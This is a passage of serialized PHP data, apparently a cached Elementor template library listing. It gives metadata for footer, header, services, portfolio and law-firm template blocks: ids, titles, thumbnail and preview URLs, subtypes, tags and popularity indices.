portfolio\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:514;s:11:\"trend_index\";i:360;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:216;a:14:{s:2:\"id\";i:7950;s:5:\"title\";s:10:\"footer 011\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.4.jpg\";s:12:\"tmpl_created\";i:1524582631;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/footer-011/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:255;s:11:\"trend_index\";i:235;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:217;a:14:{s:2:\"id\";i:7937;s:5:\"title\";s:10:\"footer 010\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.5.jpg\";s:12:\"tmpl_created\";i:1524582665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/footer-010/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:203;s:11:\"trend_index\";i:154;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:218;a:14:{s:2:\"id\";i:11897;s:5:\"title\";s:27:\"Portfolio &#8211; Project 2\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project2_small.png\";s:12:\"tmpl_created\";i:1569494236;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-project-2-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"creative portfolio\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:683;s:11:\"trend_index\";i:583;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:219;a:14:{s:2:\"id\";i:7927;s:5:\"title\";s:9:\"footer 09\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.6.jpg\";s:12:\"tmpl_created\";i:1524582691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-09/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:174;s:11:\"trend_index\";i:141;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:220;a:14:{s:2:\"id\";i:11890;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-design-portfolio.png\";s:12:\"tmpl_created\";i:1571907344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"creative portfolio\",\"header\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:323;s:11:\"trend_index\";i:213;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:221;a:14:{s:2:\"id\";i:7917;s:5:\"title\";s:9:\"footer 08\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.7.jpg\";s:12:\"tmpl_created\";i:1524582788;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-08/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:97;s:11:\"trend_index\";i:110;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:222;a:14:{s:2:\"id\";i:7904;s:5:\"title\";s:9:\"footer 07\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.8.jpg\";s:12:\"tmpl_created\";i:1524582814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-07/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:204;s:11:\"trend_index\";i:226;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:223;a:14:{s:2:\"id\";i:7837;s:5:\"title\";s:9:\"footer 01\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.14.jpg\";s:12:\"tmpl_created\";i:1524582852;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:448;s:11:\"trend_index\";i:489;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:224;a:14:{s:2:\"id\";i:7852;s:5:\"title\";s:9:\"footer 02\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.13.jpg\";s:12:\"tmpl_created\";i:1524582875;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-02/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:216;s:11:\"trend_index\";i:188;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:225;a:14:{s:2:\"id\";i:7862;s:5:\"title\";s:9:\"footer 03\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.12.jpg\";s:12:\"tmpl_created\";i:1524582903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-03/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:143;s:11:\"trend_index\";i:128;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:226;a:14:{s:2:\"id\";i:12212;s:5:\"title\";s:28:\"Law Firm &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/single.png\";s:12:\"tmpl_created\";i:1572846914;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/law-firm-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:364;s:11:\"trend_index\";i:272;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:227;a:14:{s:2:\"id\";i:7871;s:5:\"title\";s:9:\"footer 04\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.11.jpg\";s:12:\"tmpl_created\";i:1524582927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-04/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:107;s:11:\"trend_index\";i:125;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:228;a:14:{s:2:\"id\";i:12203;s:5:\"title\";s:30:\"Law Firm &#8211; Search Archiv\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/11/search_result.png\";s:12:\"tmpl_created\";i:1572846925;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/law-firm-search-archiv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:533;s:11:\"trend_index\";i:540;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:229;a:14:{s:2:\"id\";i:7884;s:5:\"title\";s:9:\"footer 05\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.10.jpg\";s:12:\"tmpl_created\";i:1524582944;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-05/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:84;s:11:\"trend_index\";i:172;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:230;a:14:{s:2:\"id\";i:12194;s:5:\"title\";s:23:\"Law Firm &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-law-firm.png\";s:12:\"tmpl_created\";i:1572846935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/law-firm-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"header\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:126;s:11:\"trend_index\";i:28;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:231;a:14:{s:2:\"id\";i:7892;s:5:\"title\";s:9:\"footer 06\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.9.jpg\";s:12:\"tmpl_created\";i:1524583015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/footer-06/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:127;s:11:\"trend_index\";i:224;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:232;a:14:{s:2:\"id\";i:12179;s:5:\"title\";s:23:\"Law Firm &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/footer.png\";s:12:\"tmpl_created\";i:1572846958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/law-firm-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"footer\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:418;s:11:\"trend_index\";i:294;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:233;a:14:{s:2:\"id\";i:4212;s:5:\"title\";s:11:\"Services 23\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_1.png\";s:12:\"tmpl_created\";i:1520443248;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-23/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:130;s:11:\"trend_index\";i:109;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:234;a:14:{s:2:\"id\";i:7825;s:5:\"title\";s:9:\"header 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.11.jpg\";s:12:\"tmpl_created\";i:1524583273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/header-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:75;s:11:\"trend_index\";i:52;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:235;a:14:{s:2:\"id\";i:12170;s:5:\"title\";s:23:\"Law Firm &#8211; Archiv\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/archiv.png\";s:12:\"tmpl_created\";i:1572846967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/law-firm-archiv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:423;s:11:\"trend_index\";i:377;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:236;a:14:{s:2:\"id\";i:4227;s:5:\"title\";s:11:\"Services 30\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_1.png\";s:12:\"tmpl_created\";i:1520443250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-30/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:329;s:11:\"trend_index\";i:431;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:237;a:14:{s:2:\"id\";i:7812;s:5:\"title\";s:9:\"header 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.10.jpg\";s:12:\"tmpl_created\";i:1524583298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/header-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:111;s:11:\"trend_index\";i:97;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:238;a:14:{s:2:\"id\";i:12164;s:5:\"title\";s:20:\"Law Firm &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/11/404.png\";s:12:\"tmpl_created\";i:1572846979;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/law-firm-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:679;s:11:\"trend_index\";i:642;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:239;a:14:{s:2:\"id\";i:4235;s:5:\"title\";s:11:\"Services 18\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_2.png\";s:12:\"tmpl_created\";i:1520443251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:282;s:11:\"trend_index\";i:342;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:240;a:14:{s:2:\"id\";i:7724;s:5:\"title\";s:8:\"header 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.3.jpg\";s:12:\"tmpl_created\";i:1524583367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:31;s:11:\"trend_index\";i:19;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:241;a:14:{s:2:\"id\";i:4244;s:5:\"title\";s:11:\"Services 26\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_2.png\";s:12:\"tmpl_created\";i:1520443253;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-26/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:483;s:11:\"trend_index\";i:548;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:242;a:14:{s:2:\"id\";i:7734;s:5:\"title\";s:8:\"header 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.4.jpg\";s:12:\"tmpl_created\";i:1524583436;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:40;s:11:\"trend_index\";i:34;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:243;a:14:{s:2:\"id\";i:4252;s:5:\"title\";s:10:\"Services 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_3.png\";s:12:\"tmpl_created\";i:1520443255;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/services-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:42;s:11:\"trend_index\";i:27;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:244;a:14:{s:2:\"id\";i:7771;s:5:\"title\";s:8:\"header 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.7.jpg\";s:12:\"tmpl_created\";i:1524583540;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:100;s:11:\"trend_index\";i:118;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:245;a:14:{s:2:\"id\";i:4260;s:5:\"title\";s:11:\"Services 25\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_3.png\";s:12:\"tmpl_created\";i:1520443257;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-25/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:176;s:11:\"trend_index\";i:162;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:246;a:14:{s:2:\"id\";i:7787;s:5:\"title\";s:8:\"header 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.8.jpg\";s:12:\"tmpl_created\";i:1524583598;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:108;s:11:\"trend_index\";i:98;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:247;a:14:{s:2:\"id\";i:4268;s:5:\"title\";s:10:\"Services 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_4.png\";s:12:\"tmpl_created\";i:1520443259;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/services-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:167;s:11:\"trend_index\";i:252;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:248;a:14:{s:2:\"id\";i:7801;s:5:\"title\";s:9:\"header 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.9.jpg\";s:12:\"tmpl_created\";i:1524583659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/header-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:55;s:11:\"trend_index\";i:73;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:249;a:14:{s:2:\"id\";i:4276;s:5:\"title\";s:11:\"Services 24\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_4.png\";s:12:\"tmpl_created\";i:1520443261;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-24/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:342;s:11:\"trend_index\";i:347;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:250;a:14:{s:2:\"id\";i:7754;s:5:\"title\";s:8:\"header 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.6.jpg\";s:12:\"tmpl_created\";i:1524583712;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:96;s:11:\"trend_index\";i:254;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:251;a:14:{s:2:\"id\";i:4284;s:5:\"title\";s:10:\"Services 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_5.png\";s:12:\"tmpl_created\";i:1520443263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/services-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:30;s:11:\"trend_index\";i:8;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:252;a:14:{s:2:\"id\";i:7713;s:5:\"title\";s:8:\"header 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.2.jpg\";s:12:\"tmpl_created\";i:1524584780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:47;s:11:\"trend_index\";i:37;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:253;a:14:{s:2:\"id\";i:4293;s:5:\"title\";s:10:\"Services 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_6.png\";s:12:\"tmpl_created\";i:1520443265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/services-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:276;s:11:\"trend_index\";i:267;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:254;a:14:{s:2:\"id\";i:7744;s:5:\"title\";s:8:\"Header 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.5.jpg\";s:12:\"tmpl_created\";i:1524584784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/header-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:61;s:11:\"trend_index\";i:100;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:255;a:14:{s:2:\"id\";i:4302;s:5:\"title\";s:10:\"Services 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_7.png\";s:12:\"tmpl_created\";i:1520443266;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/services-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:58;s:11:\"trend_index\";i:46;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:256;a:14:{s:2:\"id\";i:12229;s:5:\"title\";s:33:\"Slide In | Law Firm | Information\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/popup.png\";s:12:\"tmpl_created\";i:1572847842;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/slide-in-law-firm-information/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:18:\"[\"Law\",\"Law 